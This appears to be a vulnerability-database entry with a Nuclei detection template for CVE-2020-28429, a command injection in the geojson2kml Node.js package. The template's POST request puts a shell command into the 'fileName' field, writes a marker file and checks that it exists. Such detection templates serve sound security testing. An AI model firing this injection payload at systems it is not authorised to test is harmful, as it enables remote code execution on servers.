| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2020-28429 | 23 Feb 202118:35 | ā | circl | |
| geojsonkml Command Injection Vulnerability | 23 Feb 202100:00 | ā | cnnvd | |
| CVE-2020-28429 | 23 Feb 202115:10 | ā | cve | |
| CVE-2020-28429 Command Injection | 23 Feb 202115:10 | ā | cvelist | |
| Command Injection in geojson2kml | 10 May 202115:59 | ā | github | |
| CVE-2020-28429 | 23 Feb 202115:15 | ā | nvd | |
| GHSA-W83X-FP72-P9QC Command Injection in geojson2kml | 10 May 202115:59 | ā | osv | |
| Command injection | 23 Feb 202115:15 | ā | prion | |
| Command Injection | 11 Dec 202014:59 | ā | snyk | |
| OS Command Injection | 24 Feb 202102:08 | ā | veracode |
id: CVE-2020-28429
info:
name: geojson2kml - Command Injection
author: eeche,chae1xx1os,persona-twotwo,soonghee2
severity: critical
description: |
Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
impact: |
Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
remediation: |
Do not use geojson2kml. There is no fixed version for geojson2kml.
reference:
- https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
- https://github.com/advisories/GHSA-w83x-fp72-p9qc
- https://nvd.nist.gov/vuln/detail/CVE-2020-28429
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-28429
cwe-id: CWE-78
epss-score: 0.63305
epss-percentile: 0.99106
cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*
metadata:
max-request: 1
vendor: geojson2kml_project
product: geojson2kml
framework: node.js
tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive,vuln
variables:
filename: '{{rand_base(6)}}'
http:
- raw:
- |
POST /convert HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
"geoJsonData": {
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [102.0, 0.5]
},
"properties": {
"prop0": "value0"
}
}
]
}
}
- |
GET /file/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "{{randstr}}"
- type: word
part: header_2
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a0046304402203db203cb985e6d94bcf82eacc1471d36d031d0cf6ac6a56b2b3e1846501deed9022060efc824d09f9108ca721f682549f4355a0c6ff676285ab606ae99c3bfee88d8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation